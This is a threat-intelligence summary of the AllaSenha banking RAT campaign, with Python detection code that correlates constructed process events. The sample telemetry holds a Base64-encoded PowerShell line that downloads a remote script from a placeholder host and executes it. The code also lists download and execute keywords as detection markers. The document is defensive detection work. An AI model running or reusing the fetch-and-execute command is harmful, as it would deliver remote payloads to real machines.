May 29, 2024 at 11:09AM
A new campaign targets Brazilian banks with the Windows-based AllaSenha RAT, which uses Azure cloud infrastructure for command-and-control (C2). The attack begins with a malicious LNK file disguised as a PDF, hosted on a WebDAV server since March 2024. A launcher dubbed BPyCode fetches and executes the later stages that ultimately steal banking credentials. Separately, the Anatsa Android banking trojan has again slipped into the Google Play Store.
Key takeaways:
1. Brazilian banking institutions are being targeted by a new campaign distributing the AllaSenha remote access trojan, specifically designed to steal access credentials for Brazilian bank accounts.
2. Initial access comes through malicious links in phishing messages that lead to a Windows shortcut (LNK) file masquerading as a PDF document and hosted on a WebDAV server.
3. The BPyCode launcher executes a Base64-encoded PowerShell command that downloads and runs the BPyCode Python script; that script in turn acts as a downloader for a dynamic-link library (DLL) and loads it in memory rather than writing the final payload to disk as a separate executable.
4. AllaSenha not only steals online banking account credentials but also has the capability to capture two-factor authentication codes and deceive victims into approving fraudulent transactions.
5. Further analysis points to a Portuguese-speaking user named bert1m as the likely developer of the malware.
6. Alongside the AllaSenha campaign, the report also covers a separate malspam campaign distributing the Casbaneiro banking trojan and an Android banking trojan called Anatsa that has sneaked into the Google Play Store.
7. Anatsa quietly exfiltrates banking credentials and other financial information by abusing Android overlay and accessibility-service techniques.
8. Zscaler has identified over 90 malicious apps on the Play Store in the past few months, collectively amassing more than 5.5 million installations and propagating various malware families.
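The delivery chain in takeaways 2 and 3 (a shortcut served over WebDAV, an encoded PowerShell downloader, a Python stage spawned by that shell) leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example, not code from the original report or from the researchers it cites; it runs over constructed Sysmon-style events, and every host name, PID, path and URL in it is invented for illustration.

```python
"""Detection logic for the AllaSenha-style delivery chain summarised above.

Added example (not the report's own code). It scans constructed
process-creation events, in the shape of Sysmon Event ID 1 reduced to
host/pid/parent/image/command line, for three of the listed stages:
  1. a command line referencing a WebDAV share (DavWWWRoot) or a
     PDF-looking shortcut (.pdf.lnk)
  2. PowerShell started with a Base64-encoded command whose decoded body
     fetches and executes remote content
  3. a Python interpreter spawned by that shell (the BPyCode stage)
All hosts, paths, PIDs and URLs below are made up for illustration.
"""
import base64
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the
# trailing \s+ keeps flags such as -ep (ExecutionPolicy) from matching.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Windows WebDAV redirector paths look like \\host@SSL\DavWWWRoot\...
WEBDAV_PATH = re.compile(r"(?i)\\\\[^\\]+\\davwwwroot\\")
FAKE_PDF_LNK = re.compile(r"(?i)\.pdf\.lnk\b")
FETCH_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                 "iwr ", "iex", "invoke-expression", "start-bitstransfer")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand body (UTF-16LE text) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> List[str]:
    """Return the chain stages a single process-creation event matches."""
    cmd = str(event["command_line"])
    image = str(event["image"]).lower()
    parent = str(event["parent_image"]).lower()
    hits = []
    if WEBDAV_PATH.search(cmd) or FAKE_PDF_LNK.search(cmd):
        hits.append("webdav_or_fake_pdf_lnk")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded and any(mark in decoded.lower() for mark in FETCH_MARKERS):
            hits.append("encoded_powershell_downloader")
    if image.endswith("python.exe") and parent.endswith(
            ("powershell.exe", "pwsh.exe", "cmd.exe")):
        hits.append("python_spawned_by_shell")
    return hits


def detect_chain(events: List[dict]) -> dict:
    """Correlate stage hits per host; three distinct stages = full chain."""
    verdicts = {}
    for ev in events:
        v = verdicts.setdefault(ev["host"], {"stages": {}, "chain_complete": False})
        for stage in classify(ev):
            v["stages"].setdefault(stage, []).append(ev["pid"])
        v["chain_complete"] = len(v["stages"]) >= 3
    return verdicts


def _enc(script: str) -> str:
    """Encode a one-liner the way -EncodedCommand expects (UTF-16LE + Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed second stage (hypothetical URL, not from the report).
STAGE2_SCRIPT = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://cdn.example.invalid/bpy.py')")

# Constructed telemetry: WS01 carries the full chain, WS02 only benign noise.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "\\203.0.113.10@SSL\DavWWWRoot\docs\launch.cmd"'},
    {"host": "WS01", "pid": 4132, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -enc "
                     + _enc(STAGE2_SCRIPT)},
    {"host": "WS01", "pid": 4150,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\Python\python.exe",
     "command_line": r"C:\Users\Public\Python\python.exe C:\Users\Public\bpy.py"},
    {"host": "WS02", "pid": 880, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -EncodedCommand "
                     + _enc(r"Get-Date | Out-File C:\temp\d.txt")},
    {"host": "WS02", "pid": 902,
     "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Python312\python.exe",
     "command_line": r"C:\Python312\python.exe -m pytest"},
]

if __name__ == "__main__":
    for host, verdict in detect_chain(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Decoding the encoded command before matching matters: the Base64 blob itself carries no usable keywords, and a rule that only counts `-enc` would fire on the benign WS02 event as well. Requiring three distinct stages on the same host is what keeps the verdict out of single-indicator noise; in production you would also bound the correlation by time and by process ancestry.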
Overall, these findings show that banking-focused threats keep evolving on both desktop (LNK-delivered RATs with cloud-hosted C2) and mobile (overlay-based trojans inside official app stores), and that financial institutions and their customers need to keep detection and user-awareness measures current.